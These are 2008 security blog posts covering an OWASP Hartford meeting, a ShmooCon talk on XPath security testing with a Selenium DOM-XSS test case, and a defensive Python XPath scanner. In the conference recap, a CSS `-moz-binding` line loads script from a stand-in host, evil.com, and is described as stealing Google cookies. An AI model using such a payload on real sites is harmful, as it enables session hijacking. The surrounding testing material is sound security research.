tssci security

OWASP Hartford tomorrow

Tomorrow, February 28th, is the first ever meeting for the brand new Hartford OWASP chapter. James McGovern, the chapter lead, has been putting some effort into starting it off with a bang, so I hope everyone in the NY/CT/Mass area can make it. Agenda for the night is as follows:

The meeting will be held in the Atrium Conference Room at the Tower Building in Hartford Plaza, Hartford, CT 06115. From East (via Route 84):

  1. Approaching Hartford, follow Route 84 West to Exit 48 (Asylum Ave. Exit)
  2. At light, take a right onto Asylum Avenue
  3. Turn into entrance on right near Home Office
  4. Proceed to the Ramp Garage and park
  5. Enter the Tower Building using the West Entrance

From West (via Route 84):

  1. Approaching downtown Hartford, follow Route 84 East to Exit 48A (Asylum Ave. Exit)
  2. At light, take a left onto Asylum Avenue
  3. Turn into entrance on right near Home Office
  4. Proceed to the Ramp Garage and park
  5. Enter the Tower Building using the West Entrance

The Open Web Application Security Project (OWASP) is a worldwide free and open community focused on improving the security of application software. Our mission is to make application security "visible," so that people and organizations can make informed decisions about application security risks. Everyone is free to participate in OWASP and all of our materials are available under an open source license. The OWASP Foundation is a 501c3 not-for-profit charitable organization that ensures the ongoing availability and support for our work.

Chenxi Wang, Ph.D., Principal Analyst, Forrester

Dr. Wang is a member of Forrester's Security and Risk Management research team. Her primary coverage areas include network security, content security, application security, and vulnerability management.

Prior to joining Forrester, Chenxi was the Chief Scientist for KSR, Inc, a risk management service provider start-up in Silicon Valley. Prior to that, Chenxi was an Associate Professor at Carnegie Mellon University, where she taught and researched computer science and computer security from 2001 to 2005. She was an instrumental faculty member behind the inception of CMU's CyLab. At CMU, Chenxi led a number of high profile research projects, including multi-million dollar projects from the Department of Defense and National Science Foundation. Chenxi was a consultant to HP Labs, Emerson, Lucent, and a number of venture capital firms.

Chenxi is a frequent speaker in research conferences. She delivered invited talks at Stanford, University of Cambridge, HP Labs, and many other academic institutions. She has served as a special investigative consultant for the Federal Trade Commission. Chenxi's background lends her the technical depth and analytical skills to create insightful research and advisories. At Forrester, she has delivered webinars and keynote speeches at vendor events, and in-depth advisory sessions at Microsoft, TrendMicro, JP Morgan, and other companies.

Chenxi holds a Ph.D. in Computer Science from the University of Virginia. Her Ph.D. research received ACM's Samuel L. Alexander outstanding doctoral research award.

Gary McGraw, Ph.D., CTO, Cigital

Gary McGraw is the CTO of Cigital, Inc., a software security and quality consulting firm with headquarters in the Washington, D.C. area. He is a globally recognized authority on software security and the author of six best selling books on this topic. The latest, Exploiting Online Games was released in 2007. His other titles include Java Security, Building Secure Software, Exploiting Software, and Software Security; and he is editor of the Addison-Wesley Software Security series. Dr. McGraw has also written over 90 peer-reviewed scientific publications, authors a monthly security column for darkreading.com, and is frequently quoted in the press. Besides serving as a strategic counselor for top business and IT executives, Gary is on the Advisory Boards of Fortify Software and Raven White. His dual PhD is in Cognitive Science and Computer Science from Indiana University where he serves on the Dean's Advisory Council for the School of Informatics. Gary is an IEEE Computer Society Board of Governors member and produces the monthly Silver Bullet Security Podcast for IEEE Security & Privacy magazine.

ShmooCon 2008 -- Path X: Explosive Security Testing Tools with XPath

On Sunday, we had some technical difficulties getting my laptop to work with the projector. In a scramble to get things up and running, I forgot to send the backup screenshots I had taken just in case. Ughh.. first conference talk I give, and everything that could have gone wrong, did. LOL. It was good experience at least. Note to self: Linux + ATI video cards really do suck. I apologize to everyone that came hoping to see our work in action. I'd also like to thank Tom Brennan, President of OWASP, for helping us get set up and then giving our introduction on Sunday.

You can download our Path X: Explosive Security Testing Tools with XPath presentation slides [pdf], and here's an animated gif of using Selenium to test for DOM XSS.

Below is the HTML source of our Selenium test case, in the table format Selenium IDE reads (each row is command, target, value). The test types a script payload into the "name" field, submits the form, and then checks whether the payload ran by looking for the cookie it sets:

<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>Set a cookie via DOM XSS</title>
</head>
<body>
<!-- Selenium IDE table format: each row is command | target | value -->
<table cellpadding="1" cellspacing="1" border="1">
<thead>
<tr><td rowspan="1" colspan="3">Set a cookie via DOM XSS</td></tr>
</thead><tbody>
<tr>
    <td>open</td>
    <td>/awesome.html</td>
    <td></td>
</tr>
<tr>
    <!-- start clean, so a stale cookie cannot produce a false positive -->
    <td>deleteCookie</td>
    <td>name</td>
    <td>/</td>
</tr>
<tr>
    <!-- The payload must be HTML-escaped here; written as a literal
         <script> tag the browser would execute it while rendering this test
         file instead of typing it into the field. It also has to stay on
         one line: a JavaScript string literal may not span a line break. -->
    <td>type</td>
    <td>name</td>
    <td>&lt;script&gt;document.cookie='name=xss; expires=Thu, 2 Aug 2010 20:47:11 UTC; path=/';&lt;/script&gt;</td>
</tr>
<tr>
    <!-- XPath locator for the submit button -->
    <td>click</td>
    <td>//input[@name='chat']</td>
    <td></td>
</tr>
<tr>
    <!-- verifyCookie takes only a pattern (no value). The cookie exists only
         if the page placed our input into the DOM in a way that ran it. -->
    <td>verifyCookie</td>
    <td>name=xss</td>
    <td></td>
</tr>
<tr>
    <td>deleteCookie</td>
    <td>name</td>
    <td>/</td>
</tr>
</tbody></table>
</body>
</html>

And here is the same code as a Java integration test:

package com.example.tests;

import com.thoughtworks.selenium.*;

public class NewTest extends SeleneseTestCase {
    // Base URL and browser launcher are placeholders; point them at the
    // application under test. Selenium RC must be listening on port 4444.
    public void setUp() throws Exception {
        setUp("http://localhost/", "*firefox");
    }

    // JUnit 3 only picks up public methods whose name starts with "test"
    public void testNew() throws Exception {
        selenium.open("/awesome.html");
        selenium.deleteCookie("name", "/");   // start clean: no stale cookie
        // Payload typed into the 'name' field. The cookie only appears if
        // the page writes the input into the DOM in a way that executes it.
        selenium.type("name", "<script>document.cookie='name=xss; expires=Thu, 2 Aug 2010 20:47:11 UTC; path=/';</script>");
        selenium.click("//input[@name='chat']");   // XPath locator for the submit button
        // getCookie() returns every cookie visible to the page, so this
        // assumes 'name' is the only one set
        verifyEquals("name=xss", selenium.getCookie());
        selenium.deleteCookie("name", "/");
    }
}

We're anxious to hear any comments that you have about our presentation. We've received a lot of positive feedback so far, and want to hear more. What would be your plans for implementing this in your devshop; is it too academic or far-fetched? We want to hear what you have to say, so let us know!

Cheers! -Marcin Wielgoszewski & Andre Gironda

Back from D.C. -- ShmooCon 2008 recap

We're back from a great weekend in Washington, D.C. at ShmooCon '08. Dre and I arrived Thursday night just in time for the bar to close and, having no hotel room reserved, we were in for a long night. Interestingly enough though, at around 5am, we found that we were able to modify the look of a Google page through a CSS stylesheet we controlled. Using the tr:first-child td CSS property, we could do all sorts of things to Google's content, such as display:none and changing the color.

We had plans to meet up with Arshan of omg.wtf.bbq (and author of AntiSamy) later that morning, so he invited us back to the Aspect Security office to hang out with the team. Jeff Williams, chairman of the OWASP board, gave us a tour and we even had the chance to see the OWASP wiki, quietly humming away in its rack. So beautiful.. We showed off our finding to Arshan and Jeff to get some ideas on where to take it. I went in thinking we should try out -moz-binding:url(), so Arshan quickly wrote up some JavaScript that would steal Google cookies. We tried it out and it worked -- the working exploit affected Google through the following CSS property:

tr:first-child td {-moz-binding:url("http://evil.com/xssmoz.xml#xss");}

Later that evening, we met up with Romain Gaucher, Jon Rose, Brian Holyfield and a bunch of other people to go out drinking. We ended up discussing our talk a lot that night and some of the work we've all been doing. So much cool stuff, I can barely wrap my head around it all.

On Saturday, we hung out with Joe from Learn Security Online, who gave me some cool tips on VoIP pen-testing, which conveniently led to seeing Jason Ostrom and John Kindervag (the VoIP hacker clowns) talk about penetration testing VoIP networks, something that'll come in real handy over the next couple of weeks for me.

I met up with Hoff for a bit, going to the talk on how databases are so hard to secure... After about five minutes I followed Hoff out and went to TL1 Device Security, which was pretty much over! The discussions though were great, and I got some good information out of it, having gone in not even knowing wtf a TL1 is. Basically TL1 is SNMP for telecoms -- think SCADA without the controls, only worse. eek

The best talk of the day was hands down, Rohit and Nish's talk on Using Aspect Oriented Programming to Prevent Application Attacks. What's nice about AOP is the ability to secure legacy code without having to touch the source. It would be nice to implement AOP along with building security in throughout the entire Secure SDLC. We got to talking with Rohit and Nish, along with their friend Hugo throughout the evening.

After our talk Sunday, Chris Gates and Dean came up to us to say hello. Like they said on their blog, it's nice finally putting faces to names. Anyways, that's pretty much it for this weekend. I'm working on getting our presentation content up soon (before the night's over), so stay tuned for that.

Path X -- Explosive Security Testing

We have received details from ShmooCon with the scheduled day and time of our talk. We have been scheduled for the last talk on Sunday, at noon (before the room split), on the "Build It" track. I'm not sure whether that's a good thing or a bad thing, but we'll see. We're excited about the research we've done thus far -- we haven't seen much being done in this area, and we hope you see the value in it all. Check out the ShmooCon schedule and speakers list for the full schedule and the list of all presentations and bios.

In this talk, we'll discuss how using XPath can aid security testing during unit tests and in the integration phase of the software development lifecycle. Because XPath expressions are plain strings that name elements in a document, they make it easier to share data between open source and commercial quality testing tools, source code analysis tools and web application scanners.

First we'll go over a little history behind using regex in security tools and the paradox of parsers both being a vulnerability problem and a solution. Later, we'll explain XPath and how it's used in testing and then some XML parsing implementations in various languages. We'll close out our talk with a discussion on web application security internals, and how you can begin to [with relative ease] write your own web application security scanners.

"So all this talk about XPath without even mentioning what it is or what it does," you say? Well, XPath isn't really a tool. XPath is a query language for XML documents, and tools use it to locate elements in web pages. Other ways of locating elements in a web page are DOM (Document Object Model) methods and CSS selectors. An example of each is shown below; every one selects the <h1> element within the <div id="header">:

DOM:
document.getElementById('header').getElementsByTagName('h1');
CSS:
div#header>h1
XPath:
//div[@id='header']/h1

So how do I use XPath? How does it apply to security? Those who've read Secure Programming with Static Analysis by Brian Chess and Jacob West would make the connection to using abstract syntax trees and lexical analysis to identify software vulnerabilities. In our talk, we look at using XPath expressions to find flaws in web applications.
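As an added illustration of that last idea (example code written for this page, not something from our slides or tools), here is a small scanner that runs XPath expressions over a page to pull out security-relevant elements: the talk's own //div[@id='header']/h1, POST forms that carry no hidden CSRF token, password fields inside forms that submit over plain http://, and password fields that allow autocomplete. It uses only the Python standard library. The sample page is constructed for the example and is well-formed XHTML without a namespace, which is what xml.etree.ElementTree needs; the token field name "csrf_token" and the form ids are assumptions. Note that ElementTree wants a leading "." on expressions that begin with "//".

```python
"""XPath-driven checks over a (constructed) page, using only the standard
library. Added example for this post; the page, the form ids and the
csrf_token field name are assumptions, not anything from Path X itself."""
import xml.etree.ElementTree as ET

# Constructed sample page: one clean login form and two flawed forms.
SAMPLE_PAGE = """\
<html>
  <body>
    <div id="header"><h1>Example Bank</h1></div>
    <form id="login" method="post" action="https://bank.example/login">
      <input type="hidden" name="csrf_token" value="d3adb33f"/>
      <input type="text" name="user"/>
      <input type="password" name="pass" autocomplete="off"/>
      <input type="submit" value="Log in"/>
    </form>
    <form id="transfer" method="post" action="https://bank.example/transfer">
      <input type="text" name="to"/>
      <input type="text" name="amount"/>
      <input type="submit" value="Send"/>
    </form>
    <form id="legacy" method="post" action="http://bank.example/legacy-login">
      <input type="hidden" name="csrf_token" value="c0ffee"/>
      <input type="password" name="pin"/>
    </form>
    <div id="footer"><h1>Not the header</h1></div>
  </body>
</html>
"""


def header_h1(root):
    """The talk's example expression; ElementTree needs the leading '.'."""
    el = root.find(".//div[@id='header']/h1")
    return el.text if el is not None else None


def forms_without_csrf_token(root, token_name="csrf_token"):
    """Ids of POST forms with no hidden token field: candidate CSRF targets."""
    flagged = []
    for form in root.iterfind(".//form[@method='post']"):
        token = form.find(".//input[@type='hidden'][@name='%s']" % token_name)
        if token is None:
            flagged.append(form.get("id"))
    return flagged


def password_fields_over_http(root):
    """Ids of forms that collect a password but submit it over plain http."""
    flagged = []
    for form in root.iterfind(".//form"):
        action = form.get("action", "")
        has_password = form.find(".//input[@type='password']") is not None
        if action.startswith("http://") and has_password:
            flagged.append(form.get("id"))
    return flagged


def password_fields_with_autocomplete(root):
    """Names of password inputs that do not set autocomplete="off"."""
    return [inp.get("name")
            for inp in root.iterfind(".//input[@type='password']")
            if inp.get("autocomplete", "").lower() != "off"]


def scan(page_xml=SAMPLE_PAGE):
    """Parse the page once and run every check against the same tree."""
    root = ET.fromstring(page_xml)
    return {
        "header": header_h1(root),
        "csrf_missing": forms_without_csrf_token(root),
        "password_over_http": password_fields_over_http(root),
        "password_autocomplete": password_fields_with_autocomplete(root),
    }


if __name__ == "__main__":
    for finding, items in scan().items():
        print("%-21s %r" % (finding, items))
```

Real pages are rarely well-formed XML, so in practice the tree comes from an HTML parser (lxml.html, html5lib, or the browser's own DOM through Selenium) rather than ET.fromstring; the XPath expressions themselves stay the same, which is the point of using them as the shared vocabulary between tools.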

